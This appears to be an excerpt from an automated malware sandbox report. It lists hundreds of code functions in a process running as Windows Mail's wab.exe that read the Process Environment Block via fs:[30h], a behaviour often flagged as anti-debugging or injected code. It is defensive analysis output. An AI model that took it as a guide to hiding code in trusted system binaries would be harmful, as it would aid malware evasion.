Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2C3CD mov eax, dword ptr fs:[00000030h]		1_2_02F2C3CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA33A0 mov eax, dword ptr fs:[00000030h]		1_2_02EA33A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA33A0 mov eax, dword ptr fs:[00000030h]		1_2_02EA33A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E933A5 mov eax, dword ptr fs:[00000030h]		1_2_02E933A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9438F mov eax, dword ptr fs:[00000030h]		1_2_02E9438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9438F mov eax, dword ptr fs:[00000030h]		1_2_02E9438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4539D mov eax, dword ptr fs:[00000030h]		1_2_02F4539D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6E388 mov eax, dword ptr fs:[00000030h]		1_2_02E6E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6E388 mov eax, dword ptr fs:[00000030h]		1_2_02E6E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6E388 mov eax, dword ptr fs:[00000030h]		1_2_02E6E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E68397 mov eax, dword ptr fs:[00000030h]		1_2_02E68397
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E68397 mov eax, dword ptr fs:[00000030h]		1_2_02E68397
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E68397 mov eax, dword ptr fs:[00000030h]		1_2_02E68397
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EC739A mov eax, dword ptr fs:[00000030h]		1_2_02EC739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EC739A mov eax, dword ptr fs:[00000030h]		1_2_02EC739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1437C mov eax, dword ptr fs:[00000030h]		1_2_02F1437C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F367 mov eax, dword ptr fs:[00000030h]		1_2_02F2F367
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E77370 mov eax, dword ptr fs:[00000030h]		1_2_02E77370
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E77370 mov eax, dword ptr fs:[00000030h]		1_2_02E77370
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E77370 mov eax, dword ptr fs:[00000030h]		1_2_02E77370
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3A352 mov eax, dword ptr fs:[00000030h]		1_2_02F3A352
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF2349 mov eax, dword ptr fs:[00000030h]		1_2_02EF2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6D34C mov eax, dword ptr fs:[00000030h]		1_2_02E6D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6D34C mov eax, dword ptr fs:[00000030h]		1_2_02E6D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF035C mov eax, dword ptr fs:[00000030h]		1_2_02EF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF035C mov eax, dword ptr fs:[00000030h]		1_2_02EF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF035C mov eax, dword ptr fs:[00000030h]		1_2_02EF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF035C mov ecx, dword ptr fs:[00000030h]		1_2_02EF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF035C mov eax, dword ptr fs:[00000030h]		1_2_02EF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF035C mov eax, dword ptr fs:[00000030h]		1_2_02EF035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F45341 mov eax, dword ptr fs:[00000030h]		1_2_02F45341
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69353 mov eax, dword ptr fs:[00000030h]		1_2_02E69353
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69353 mov eax, dword ptr fs:[00000030h]		1_2_02E69353
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9F32A mov eax, dword ptr fs:[00000030h]		1_2_02E9F32A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E67330 mov eax, dword ptr fs:[00000030h]		1_2_02E67330
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3132D mov eax, dword ptr fs:[00000030h]		1_2_02F3132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3132D mov eax, dword ptr fs:[00000030h]		1_2_02F3132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA30B mov eax, dword ptr fs:[00000030h]		1_2_02EAA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA30B mov eax, dword ptr fs:[00000030h]		1_2_02EAA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA30B mov eax, dword ptr fs:[00000030h]		1_2_02EAA30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF930B mov eax, dword ptr fs:[00000030h]		1_2_02EF930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF930B mov eax, dword ptr fs:[00000030h]		1_2_02EF930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF930B mov eax, dword ptr fs:[00000030h]		1_2_02EF930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6C310 mov ecx, dword ptr fs:[00000030h]		1_2_02E6C310
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E90310 mov ecx, dword ptr fs:[00000030h]		1_2_02E90310
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6A0E3 mov ecx, dword ptr fs:[00000030h]		1_2_02E6A0E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E950E4 mov eax, dword ptr fs:[00000030h]		1_2_02E950E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E950E4 mov ecx, dword ptr fs:[00000030h]		1_2_02E950E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E780E9 mov eax, dword ptr fs:[00000030h]		1_2_02E780E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6C0F0 mov eax, dword ptr fs:[00000030h]		1_2_02E6C0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB20F0 mov ecx, dword ptr fs:[00000030h]		1_2_02EB20F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov ecx, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov ecx, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov ecx, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov ecx, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E870C0 mov eax, dword ptr fs:[00000030h]		1_2_02E870C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F450D9 mov eax, dword ptr fs:[00000030h]		1_2_02F450D9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF20DE mov eax, dword ptr fs:[00000030h]		1_2_02EF20DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E990DB mov eax, dword ptr fs:[00000030h]		1_2_02E990DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F360B8 mov eax, dword ptr fs:[00000030h]		1_2_02F360B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F360B8 mov ecx, dword ptr fs:[00000030h]		1_2_02F360B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6D08D mov eax, dword ptr fs:[00000030h]		1_2_02E6D08D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7208A mov eax, dword ptr fs:[00000030h]		1_2_02E7208A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E75096 mov eax, dword ptr fs:[00000030h]		1_2_02E75096
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA909C mov eax, dword ptr fs:[00000030h]		1_2_02EA909C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9D090 mov eax, dword ptr fs:[00000030h]		1_2_02E9D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9D090 mov eax, dword ptr fs:[00000030h]		1_2_02E9D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F45060 mov eax, dword ptr fs:[00000030h]		1_2_02F45060
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov ecx, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E81070 mov eax, dword ptr fs:[00000030h]		1_2_02E81070
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9C073 mov eax, dword ptr fs:[00000030h]		1_2_02E9C073
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1705E mov ebx, dword ptr fs:[00000030h]		1_2_02F1705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1705E mov eax, dword ptr fs:[00000030h]		1_2_02F1705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E72050 mov eax, dword ptr fs:[00000030h]		1_2_02E72050
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B052 mov eax, dword ptr fs:[00000030h]		1_2_02E9B052
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6A020 mov eax, dword ptr fs:[00000030h]		1_2_02E6A020
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6C020 mov eax, dword ptr fs:[00000030h]		1_2_02E6C020
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3903E mov eax, dword ptr fs:[00000030h]		1_2_02F3903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3903E mov eax, dword ptr fs:[00000030h]		1_2_02F3903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3903E mov eax, dword ptr fs:[00000030h]		1_2_02F3903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3903E mov eax, dword ptr fs:[00000030h]		1_2_02F3903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E016 mov eax, dword ptr fs:[00000030h]		1_2_02E8E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E016 mov eax, dword ptr fs:[00000030h]		1_2_02E8E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E016 mov eax, dword ptr fs:[00000030h]		1_2_02E8E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E016 mov eax, dword ptr fs:[00000030h]		1_2_02E8E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E951EF mov eax, dword ptr fs:[00000030h]		1_2_02E951EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E751ED mov eax, dword ptr fs:[00000030h]		1_2_02E751ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F461E5 mov eax, dword ptr fs:[00000030h]		1_2_02F461E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA01F8 mov eax, dword ptr fs:[00000030h]		1_2_02EA01F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F361C3 mov eax, dword ptr fs:[00000030h]		1_2_02F361C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F361C3 mov eax, dword ptr fs:[00000030h]		1_2_02F361C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAD1D0 mov eax, dword ptr fs:[00000030h]		1_2_02EAD1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAD1D0 mov ecx, dword ptr fs:[00000030h]		1_2_02EAD1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F451CB mov eax, dword ptr fs:[00000030h]		1_2_02F451CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F211A4 mov eax, dword ptr fs:[00000030h]		1_2_02F211A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F211A4 mov eax, dword ptr fs:[00000030h]		1_2_02F211A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F211A4 mov eax, dword ptr fs:[00000030h]		1_2_02F211A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F211A4 mov eax, dword ptr fs:[00000030h]		1_2_02F211A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8B1B0 mov eax, dword ptr fs:[00000030h]		1_2_02E8B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB0185 mov eax, dword ptr fs:[00000030h]		1_2_02EB0185
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF019F mov eax, dword ptr fs:[00000030h]		1_2_02EF019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF019F mov eax, dword ptr fs:[00000030h]		1_2_02EF019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF019F mov eax, dword ptr fs:[00000030h]		1_2_02EF019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF019F mov eax, dword ptr fs:[00000030h]		1_2_02EF019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6A197 mov eax, dword ptr fs:[00000030h]		1_2_02E6A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6A197 mov eax, dword ptr fs:[00000030h]		1_2_02E6A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6A197 mov eax, dword ptr fs:[00000030h]		1_2_02E6A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2C188 mov eax, dword ptr fs:[00000030h]		1_2_02F2C188
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2C188 mov eax, dword ptr fs:[00000030h]		1_2_02F2C188
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F09179 mov eax, dword ptr fs:[00000030h]		1_2_02F09179
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F172 mov eax, dword ptr fs:[00000030h]		1_2_02E6F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F45152 mov eax, dword ptr fs:[00000030h]		1_2_02F45152
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69148 mov eax, dword ptr fs:[00000030h]		1_2_02E69148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69148 mov eax, dword ptr fs:[00000030h]		1_2_02E69148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69148 mov eax, dword ptr fs:[00000030h]		1_2_02E69148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69148 mov eax, dword ptr fs:[00000030h]		1_2_02E69148
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6C156 mov eax, dword ptr fs:[00000030h]		1_2_02E6C156
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E76154 mov eax, dword ptr fs:[00000030h]		1_2_02E76154
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E76154 mov eax, dword ptr fs:[00000030h]		1_2_02E76154
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F04144 mov eax, dword ptr fs:[00000030h]		1_2_02F04144
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F04144 mov eax, dword ptr fs:[00000030h]		1_2_02F04144
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F04144 mov ecx, dword ptr fs:[00000030h]		1_2_02F04144
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F04144 mov eax, dword ptr fs:[00000030h]		1_2_02F04144
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F04144 mov eax, dword ptr fs:[00000030h]		1_2_02F04144
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E77152 mov eax, dword ptr fs:[00000030h]		1_2_02E77152
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA0124 mov eax, dword ptr fs:[00000030h]		1_2_02EA0124
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B136 mov eax, dword ptr fs:[00000030h]		1_2_02E6B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B136 mov eax, dword ptr fs:[00000030h]		1_2_02E6B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B136 mov eax, dword ptr fs:[00000030h]		1_2_02E6B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B136 mov eax, dword ptr fs:[00000030h]		1_2_02E6B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E71131 mov eax, dword ptr fs:[00000030h]		1_2_02E71131
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E71131 mov eax, dword ptr fs:[00000030h]		1_2_02E71131
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F30115 mov eax, dword ptr fs:[00000030h]		1_2_02F30115
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1A118 mov ecx, dword ptr fs:[00000030h]		1_2_02F1A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1A118 mov eax, dword ptr fs:[00000030h]		1_2_02F1A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1A118 mov eax, dword ptr fs:[00000030h]		1_2_02F1A118
